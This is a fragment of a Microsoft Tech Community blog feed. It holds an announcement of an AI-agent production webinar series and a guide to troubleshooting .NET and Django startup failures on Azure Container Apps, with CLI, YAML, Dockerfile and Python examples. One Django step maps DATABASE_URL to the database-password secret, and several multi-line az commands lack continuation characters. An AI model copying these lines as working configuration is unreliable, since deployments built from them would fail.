&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/mirroring/overview" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Get started with Microsoft Fabric Mirroring&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/databricks/delta-live-tables/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Build an ETL pipeline with Lakeflow Declarative Pipelines&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/databricks/query-federation/onelake" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Configure Unity Catalog with OneLake shortcuts&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/data-engineering/browse-spark-applications-monitoring-hub" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Monitor Fabric pipelines with the Fabric monitor hub&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt; &amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Tue, 09 Jun 2026 18:48:03 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/streaming-and-batch-data-architectures-with-microsoft-fabric-to/ba-p/4526166</guid>
      <dc:creator>Rafia_Aqil</dc:creator>
      <dc:date>2026-06-09T18:48:03Z</dc:date>
    </item>
    <item>
      <title>Announcing the Path to Production for Agents Webinar Series</title>
      <link>https://techcommunity.microsoft.com/t5/azure-architecture-blog/announcing-the-path-to-production-for-agents-webinar-series/ba-p/4526560</link>
      <description>&lt;P&gt;Many organizations have made significant progress exploring AI by building pilots, prototypes, and proofs of concept. Yet a common challenge remains: how do you move from promising experiments to production-ready systems that are secure, scalable, and trusted? Join us for the Path to Production for Agents Webinar Series on July 27-28, a two-day deep dive designed to help technical teams operationalize AI and agent-based solutions using proven architecture patterns, governance models, and engineering practices.&lt;/P&gt;
&lt;P&gt;Use this link to register: &lt;A class="lia-external-url" href="https://forms.cloud.microsoft/r/g8XmGUi5wq" target="_blank" rel="noopener"&gt;Path to Production for Agents&lt;/A&gt;&lt;/P&gt;
&lt;H1&gt;Why this series matters&lt;/H1&gt;
&lt;P&gt;A large percentage of AI initiatives never make it to production—not because of lack of ambition, but because organizations struggle to establish trustworthy, governed AI systems; build scalable architectural foundations; manage risk, cost, and operational complexity; and ensure reliability in non-deterministic systems. This webinar series addresses those challenges head-on with concrete, actionable guidance spanning the full lifecycle of production AI systems.&lt;/P&gt;
&lt;H1&gt;What attendees will learn&lt;/H1&gt;
&lt;P&gt;This series delivers an implementation-focused roadmap for building, deploying, and operating AI agents at enterprise scale. Each session dives deep into governance, architecture patterns, orchestration, security, evaluation, and observability, with reference architectures and real-world engineering examples. Learn how to design scalable agent systems, integrate with enterprise data and services, and apply best practices for reliability and performance.&lt;BR /&gt;&lt;BR /&gt;Attendees will leave with practical techniques and proven patterns to confidently ship production-grade agent solutions. After the series, customers with Unified Contracts are eligible for a packaged set of engagements in which Microsoft cloud solution architects help implement this guidance. Other customers can contact their partner to learn more about the Frontier Transformation Offer through the Frontier Accelerate program.&lt;/P&gt;
&lt;H1&gt;Session overview&lt;/H1&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Day&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Session&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Focus&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Speaker&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 27&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI Center of Excellence (CoE) &amp;amp; Governance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Create a governance framework with quality gates that helps organizations deliver secure, responsible, trustworthy AI at scale.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Akiriti Mehta&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Divye Sheth&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 27&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI Landing Zones&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Build a production-ready reference architecture for AI applications and agents with guardrails for networking, identity, security, and cost governance.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Nadeem Ishqair&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Bilal Amjad&lt;/P&gt;
&lt;img /&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 27&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agentic Architecture&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Adopt a governance-first, multi-agent architecture blueprint that embeds controls from user channels and orchestration through integration layers, data, and models.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Yeliz Kilinc&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Nour Shaker&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 28&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AgentOps&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Apply DevOps principles to production AI, including evaluation, CI/CD quality gates, observability, monitoring, red teaming, and incident response.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Paulo Lacerda&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Richard Healy&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;DB Lee&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 28&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI Security, Trust &amp;amp; Observability&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Address prompt injection, data leakage, autonomous tool misuse, and AI-specific observability requirements for traceability, safety, and auditability.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Yuening Chen&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Raaid Mahbub&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 28&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Solution Optimization&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Reduce token cost, cut latency, tune RAG, optimize multi-agent coordination, and apply FinOps practices for sustainable scale.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Tanuja Bhamidipati&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Fatos Ismali&lt;/P&gt;
&lt;img /&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H1&gt;Day 1: Establishing the foundation for production AI&lt;/H1&gt;
&lt;P&gt;&lt;STRONG&gt;July 27&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;AI Center of Excellence (CoE) &amp;amp; Governance&lt;/H2&gt;
&lt;P&gt;Why do so many AI initiatives die in the PoC graveyard? Because organizations cannot trust the AI. This session shows how an AI CoE and a governance framework together create a uniform quality gate at every layer of an organization's AI applications, delivering a single, organization-wide view of secure, responsible, trustworthy AI that is ready to scale.&lt;/P&gt;
&lt;H2&gt;AI Landing Zones&lt;/H2&gt;
&lt;P&gt;Scaling AI from experimentation to production demands a secure, governed, and scalable foundation. This session explores how AI Landing Zones provide a production-ready reference architecture for deploying AI applications and agents with the right guardrails for networking, identity, security, and cost governance, aligned with the Cloud Adoption Framework and Well-Architected best practices. Attendees will learn how to design AI platforms that balance innovation with compliance, accelerate time-to-production using validated architectures and infrastructure-as-code, and integrate AI services into enterprise environments.&lt;/P&gt;
&lt;H2&gt;Agentic Architecture&lt;/H2&gt;
&lt;P&gt;Many enterprise AI pilots stall not for lack of technology, but because they lack a trustworthy architecture. This session introduces a governance-first, multi-agent architecture blueprint that closes the trust gap by embedding uniform controls and quality checks at every level, from user channels and agent orchestration through integration layers to core data and models, under a common governance and security framework. Attendees will learn how this layered agentic architecture creates a reliable, enterprise-wide AI fabric that organizations can adopt with confidence, aligning AI initiatives with high standards of trust, interoperability, and scale.&lt;/P&gt;
&lt;H1&gt;Day 2: Operating and scaling AI in production&lt;/H1&gt;
&lt;P&gt;&lt;STRONG&gt;July 28&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;AgentOps&lt;/H2&gt;
&lt;P&gt;This session covers the full lifecycle of deploying and operating agentic AI solutions in production. We will explore how teams can move from successful prototypes to production-ready agents using evaluation, CI/CD quality gates, observability, continuous monitoring, scheduled red teaming, and incident response practices. We will also cover how to apply DevOps principles to the unique challenges of AI systems, including non-deterministic behavior, prompt regression, model drift, tool-calling risk, and changing user behavior. Attendees will learn a practical AgentOps operating model for improving release confidence, detecting regressions earlier, and connecting agent operations back to Microsoft Foundry and Azure Monitor.&lt;/P&gt;
&lt;H2&gt;AI Security, Trust &amp;amp; Observability&lt;/H2&gt;
&lt;P&gt;This session focuses on securing AI systems in production, addressing risks beyond traditional application security such as prompt injection, data leakage, and autonomous tool misuse. It applies a defense-in-depth approach across identity, data protection, orchestration, and runtime controls. It also introduces AI-specific observability for trust and compliance, including traceability, safety and security monitoring, and auditability, ensuring AI systems are secure, controllable, and compliant at scale.&lt;/P&gt;
&lt;H2&gt;Solution Optimization&lt;/H2&gt;
&lt;P&gt;Getting AI to production is only half the battle. Once agentic workloads are live, organizations face compounding challenges including rising token costs, latency that degrades user trust, RAG pipelines that return noise instead of signal, and orchestration overhead that multiplies with every agent added to the mesh. This session provides a practical engineering playbook for optimizing agentic AI across the full stack, from model selection and inference routing through prompt compression, RAG tuning, caching strategies, and multi-agent coordination. It also covers the FinOps discipline required to control cost at scale, including capacity sizing, batch processing, and intelligent model routing. Attendees will leave with actionable patterns for reducing inference cost, cutting latency, and scaling reliably across regions.&lt;/P&gt;
&lt;H1&gt;Who should attend&lt;/H1&gt;
&lt;UL&gt;
&lt;LI&gt;Cloud and solution architects&lt;/LI&gt;
&lt;LI&gt;AI and ML engineers and developers&lt;/LI&gt;
&lt;LI&gt;Platform engineering and infrastructure teams&lt;/LI&gt;
&lt;LI&gt;Technical decision-makers driving AI transformation initiatives&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;If your team is working to move AI beyond prototypes into production-scale systems, this series will provide directly applicable guidance for architecture, governance, operations, and optimization.&lt;/P&gt;
&lt;H1&gt;Next steps after the webinar series&lt;/H1&gt;
&lt;P&gt;We will conduct a personalized assessment of your organization’s readiness to adopt AI agents at scale.&lt;/P&gt;
&lt;H1&gt;Call to action&lt;/H1&gt;
&lt;P&gt;Join us on July 27-28 to accelerate your path from AI experimentation to trusted, enterprise-scale production systems.&lt;/P&gt;
&lt;P&gt;Use this link to register: &lt;A href="https://forms.cloud.microsoft/r/g8XmGUi5wq" target="_blank" rel="noopener"&gt;Path to Production for Agents&lt;/A&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 12:58:42 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-architecture-blog/announcing-the-path-to-production-for-agents-webinar-series/ba-p/4526560</guid>
      <dc:creator>brauerblogs</dc:creator>
      <dc:date>2026-06-09T12:58:42Z</dc:date>
    </item>
    <item>
      <title>Troubleshooting Azure Container Apps and Jobs for .NET and Django Workloads</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-developer-community/troubleshooting-azure-container-apps-and-jobs-for-net-and-django/ba-p/4518303</link>
      <description>&lt;H1&gt;Introduction&lt;/H1&gt;
&lt;P&gt;Deploying to Azure Container Apps feels like a huge step forward — you get serverless containers, automatic scaling, built-in ingress, and managed environments without managing Kubernetes directly. But when something goes wrong and your container refuses to start, or your Container App Job silently fails, it can feel like debugging inside a black box.&lt;/P&gt;
&lt;P&gt;This first part of our four-part series walks through the most common deployment and startup failures you will hit when running .NET and Django applications on Azure Container Apps and Container App Jobs. We cover what the real error looks like, why it is happening under the hood, and what you need to do to fix it — step by step.&lt;/P&gt;
&lt;H3&gt;The Real-World Problem: "My Container App is stuck in a restart loop and I have no idea why"&lt;/H3&gt;
&lt;P&gt;This is probably the most common thing engineers report when they first move workloads to Azure Container Apps. The deployment finishes successfully, the revision shows as active, but the app never becomes healthy. In the Azure portal it cycles between `Running` and `Degraded`, and in the logs you see cryptic exit codes or — even worse — nothing at all.&lt;/P&gt;
&lt;P&gt;The root causes almost always fall into one of these buckets:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;The container exits immediately because the process crashes on startup (misconfiguration, missing secrets, unhandled exceptions).&lt;/LI&gt;
&lt;LI&gt;The health probe fails because the app takes too long to start or is listening on the wrong port.&lt;/LI&gt;
&lt;LI&gt;A Container App Job never completes because it times out or the job process exits with a non-zero code.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;Let us walk through each of these in detail.&lt;/P&gt;
&lt;H5&gt;&lt;STRONG&gt;Scenario 1: Your .NET Application Crashes at Startup&lt;/STRONG&gt;&lt;/H5&gt;
&lt;H6&gt;&lt;STRONG&gt;What You See&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Your Container App revision goes into a restart loop. You check the Log Analytics workspace and see something like this:&lt;/P&gt;
&lt;LI-CODE lang="kusto"&gt;ContainerAppConsoleLogs_CL
| where ContainerAppName_s == "my-dotnet-api"
| where TimeGenerated &amp;gt; ago(30m)
| project TimeGenerated, Log_s
| order by TimeGenerated desc&lt;/LI-CODE&gt;
&lt;P&gt;The output shows:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Unhandled exception. System.InvalidOperationException: Unable to resolve service for type 'MyApp.Data.AppDbContext'&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp;at Microsoft.Extensions.DependencyInjection.ServiceProviderServiceExtensions.GetRequiredService&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp;...&lt;/P&gt;
&lt;P&gt;Application is shutting down.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Or even more commonly with Entity Framework Core:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;fail: Microsoft.EntityFrameworkCore.Database.Connection&lt;/P&gt;
&lt;P&gt;An error occurred using the connection to database 'mydb' on server 'myserver.database.windows.net'.&lt;/P&gt;
&lt;P&gt;System.Net.Sockets.SocketException: Connection refused&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H6&gt;&lt;STRONG&gt;Why This Happens&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;When a .NET 6+ application starts, it runs `builder.Build()` and the rest of the startup code in `Program.cs` before it accepts traffic. If a service that startup depends on (such as a database context) cannot be constructed, or if the connection string is missing or wrong, the application throws an unhandled exception and the process exits with a non-zero code. Container Apps detects the exit and restarts the container, and the cycle repeats until the underlying configuration problem is fixed.&lt;/P&gt;
&lt;P&gt;The most frequent trigger is missing or incorrectly named environment variables and secrets. In local development you rely on `appsettings.Development.json` or `user secrets`, but in Container Apps those files are not present unless you explicitly copy them into the image (which you should never do for secrets).&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Step-by-Step Fix&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1 — Verify your secrets and environment variables are configured correctly.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;In the Azure portal, navigate to your Container App → &lt;STRONG&gt;Configuration&lt;/STRONG&gt; → &lt;STRONG&gt;Secrets &lt;/STRONG&gt;and &lt;STRONG&gt;Environment variables&lt;/STRONG&gt;. Make sure every value your app reads from &lt;EM&gt;IConfiguration&lt;/EM&gt; is defined here.&lt;/P&gt;
&lt;P&gt;From the CLI you can inspect and update them like this:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Add or update a secret reference
az containerapp secret set 
  --name my-dotnet-api 
  --resource-group my-rg 
  --secrets "connectionstring=Server=myserver.database.windows.net;..."

# Reference that secret as an environment variable
az containerapp update 
  --name my-dotnet-api 
  --resource-group my-rg 
  --set-env-vars "ConnectionStrings__DefaultConnection=secretref:connectionstring"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2 — Make sure your .NET app reads configuration correctly.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The naming convention that trips up almost everyone: the .NET environment variable configuration provider treats a double underscore (`__`) in a variable name as the colon (`:`) separator used in configuration keys. This is .NET behavior, not something specific to Azure Container Apps. So `ConnectionStrings:DefaultConnection` becomes `ConnectionStrings__DefaultConnection` as the environment variable name.&lt;/P&gt;
&lt;LI-CODE lang="csharp"&gt;// This reads from "ConnectionStrings__DefaultConnection" env var automatically

builder.Services.AddDbContext&amp;lt;AppDbContext&amp;gt;(options =&amp;gt;
    options.UseSqlServer(builder.Configuration.GetConnectionString("DefaultConnection")));&lt;/LI-CODE&gt;
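&lt;P&gt;To make the mapping concrete, here is a minimal Python sketch of the translation described above. It only illustrates the naming rule and is not how .NET implements it; the helper names `env_to_config_key` and `find_connection_string` are hypothetical.&lt;/P&gt;

```python
def env_to_config_key(env_name):
    """Translate an environment variable name into a .NET-style configuration key."""
    return env_name.replace("__", ":")


def find_connection_string(environ, name="DefaultConnection"):
    """Look up ConnectionStrings:NAME among environment-style variables."""
    wanted = ("ConnectionStrings:" + name).lower()
    for env_name, value in environ.items():
        # .NET configuration keys are case-insensitive, so compare in lower case.
        if env_to_config_key(env_name).lower() == wanted:
            return value
    return None


if __name__ == "__main__":
    sample = {"ConnectionStrings__DefaultConnection": "Server=example;"}
    print(env_to_config_key("ConnectionStrings__DefaultConnection"))
    print(find_connection_string(sample))
```

&lt;P&gt;A variable named with a single underscore, such as `ConnectionStrings_DefaultConnection`, does not match, which is a common cause of a connection string that appears to be set but is never read.&lt;/P&gt;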
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3 — Add a startup health check that gives meaningful feedback.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Configure a liveness probe with a generous initial delay to avoid a container being killed before it has had time to start:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# In your Container App YAML configuration

probes:
  - type: Liveness
    httpGet:
      path: /health
      port: 8080
    initialDelaySeconds: 30
    periodSeconds: 10
    failureThreshold: 5
  - type: Readiness
    httpGet:
      path: /health/ready
      port: 8080
    initialDelaySeconds: 15
    periodSeconds: 5
    failureThreshold: 3&lt;/LI-CODE&gt;
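&lt;P&gt;It helps to work out how much startup time these probe settings actually allow. The sketch below is a rough approximation, assuming Kubernetes-style probe semantics where every probe fails, and ignoring probe timeouts and scheduling jitter. The function name `seconds_until_restart` is hypothetical.&lt;/P&gt;

```python
def seconds_until_restart(initial_delay, period, failure_threshold):
    """Approximate time from container start to a probe-triggered failure.

    Assumes every probe fails, and ignores probe timeouts and scheduling jitter.
    """
    # The first probe fires after the initial delay; each further failure is one period later.
    return initial_delay + period * (failure_threshold - 1)


if __name__ == "__main__":
    # Values taken from the liveness probe in the YAML above.
    print(seconds_until_restart(initial_delay=30, period=10, failure_threshold=5))  # 70
```

&lt;P&gt;With the liveness values shown above, the app has roughly 70 seconds to start answering on `/health`. If your app regularly needs longer than that, raise `failureThreshold` or consider a startup probe rather than relying on the initial delay alone.&lt;/P&gt;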
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Add the corresponding health endpoint in your .NET app:&lt;/P&gt;
&lt;LI-CODE lang="csharp"&gt;// Program.cs

builder.Services.AddHealthChecks()
    .AddSqlServer(
        builder.Configuration.GetConnectionString("DefaultConnection")!,
        name: "database",
        tags: new[] { "ready" });

app.MapHealthChecks("/health");
app.MapHealthChecks("/health/ready", new HealthCheckOptions
{
    Predicate = check =&amp;gt; check.Tags.Contains("ready")
});&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 4 — Pull the raw container logs using the CLI&lt;/STRONG&gt; to see exactly what happened before the container exited:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az containerapp logs show 
  --name my-dotnet-api 
  --resource-group my-rg 
  --type console 
  --tail 50&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H5&gt;&lt;STRONG&gt;Scenario 2: Your Django Application Fails to Start&lt;/STRONG&gt;&lt;/H5&gt;
&lt;H6&gt;&lt;STRONG&gt;What You See&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Your Django app deploys, the container starts, but within seconds it exits. In the logs you see one of these common errors:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;django.core.exceptions.ImproperlyConfigured: Set the SECRET_KEY environment variable&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Or:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;django.db.utils.OperationalError: could not connect to server: Connection refused&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp; Is the server running on host "localhost" (127.0.0.1) and accepting&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp; TCP/IP connections on port 5432?&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Or the static files problem that catches almost everyone:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;[Errno 2] No such file or directory: '/app/staticfiles'&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H6&gt;&lt;STRONG&gt;Why This Happens&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Django loads its settings as soon as the WSGI/ASGI server imports your project. If `&lt;STRONG&gt;SECRET_KEY&lt;/STRONG&gt;` is not set, or if the database settings fall back to a local default such as `localhost` because the real values were never provided, startup fails and the container exits. If `&lt;STRONG&gt;ALLOWED_HOSTS&lt;/STRONG&gt;` does not include the ingress FQDN, the process starts, but with `&lt;STRONG&gt;DEBUG=False&lt;/STRONG&gt;` Django rejects those requests with a 400 response, so the app never looks healthy from the outside.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The static files error comes up because many teams forget to run `&lt;STRONG&gt;python manage.py collectstatic&lt;/STRONG&gt;` as part of the container image build process. The `&lt;STRONG&gt;STATIC_ROOT&lt;/STRONG&gt;` directory simply does not exist at runtime.&lt;/P&gt;
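&lt;P&gt;One way to make these failures easier to read in the logs is to check for required variables at the top of your settings module and report all of the missing ones at once. The following is a minimal sketch under that assumption; `missing_settings` and `check_environment` are hypothetical helper names, and in a Django project you may prefer to raise `django.core.exceptions.ImproperlyConfigured` instead of `RuntimeError`.&lt;/P&gt;

```python
import os


def missing_settings(required, environ=None):
    """Return the names in `required` that are unset or empty, in order."""
    environ = os.environ if environ is None else environ
    return [name for name in required if not environ.get(name)]


def check_environment(required, environ=None):
    """Raise a single error that names every missing variable."""
    missing = missing_settings(required, environ)
    if missing:
        raise RuntimeError(
            "Missing required environment variables: " + ", ".join(missing)
        )


if __name__ == "__main__":
    # Hypothetical variable names; use the ones your settings module reads.
    try:
        check_environment(["DJANGO_SECRET_KEY", "DATABASE_URL"], {"DATABASE_URL": "x"})
    except RuntimeError as error:
        print(error)
```

&lt;P&gt;Because the message lists every missing name, a single look at the console logs tells you what to add to the Container App configuration.&lt;/P&gt;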
&lt;H6&gt;&lt;STRONG&gt;Step-by-Step Fix&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1 — Set required Django environment variables in your Container App.&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az containerapp secret set 
  --name my-django-app 
  --resource-group my-rg 
  --secrets 
    "django-secret-key=your-very-secret-key-here" 
    "db-password=your-db-password"
az containerapp update 
  --name my-django-app 
  --resource-group my-rg 
  --set-env-vars 
    "DJANGO_SECRET_KEY=secretref:django-secret-key" 
    "DEBUG=False" 
    "ALLOWED_HOSTS=my-django-app.happyfield-abc123.eastus.azurecontainerapps.io" 

    "DATABASE_URL=secretref:db-password"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2 — Run `collectstatic` during Docker image build, not at runtime.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This is a very common mistake. Static files should be baked into the image, not generated when the container starts. Update your `&lt;STRONG&gt;Dockerfile&lt;/STRONG&gt;`:&lt;/P&gt;
&lt;LI-CODE lang="docker"&gt;FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Collect static files at build time with a placeholder key.
# Use the same variable name your settings.py reads (DJANGO_SECRET_KEY in Step 1).
RUN DJANGO_SECRET_KEY=build-time-placeholder python manage.py collectstatic --noinput
EXPOSE 8000
CMD ["gunicorn", "myproject.wsgi:application", "--bind", "0.0.0.0:8000", "--workers", "2", "--timeout", "120"]&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3 — Make sure Gunicorn is configured correctly for Container Apps.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The most important thing to verify is that Gunicorn is binding to `&lt;STRONG&gt;0.0.0.0&lt;/STRONG&gt;` and not `&lt;STRONG&gt;127.0.0.1&lt;/STRONG&gt;`. Container Apps expects the application to listen on all interfaces so that the ingress layer can reach it. Also make sure the port matches what you defined in your Container App's ingress target port:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Set ingress to match Gunicorn's bind port
az containerapp ingress update 
  --name my-django-app 
  --resource-group my-rg 
  --target-port 8000 
  --type external&lt;/LI-CODE&gt;
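&lt;P&gt;If you prefer to keep the Gunicorn options out of the `CMD` line, they can live in a `gunicorn.conf.py` file, which is plain Python. The sketch below mirrors the values used in the Dockerfile above. Reading the port from a `PORT` environment variable is an assumption made for illustration (the platform does not require it), and `build_bind` is a hypothetical helper.&lt;/P&gt;

```python
import os


def build_bind(environ=None, default_port="8000"):
    """Build a Gunicorn bind address that listens on all interfaces."""
    environ = os.environ if environ is None else environ
    return "0.0.0.0:" + environ.get("PORT", default_port)


# Gunicorn reads these module-level names from gunicorn.conf.py.
bind = build_bind()
workers = 2
timeout = 120
accesslog = "-"  # "-" sends the access log to stdout
errorlog = "-"   # "-" sends the error log to stderr
```

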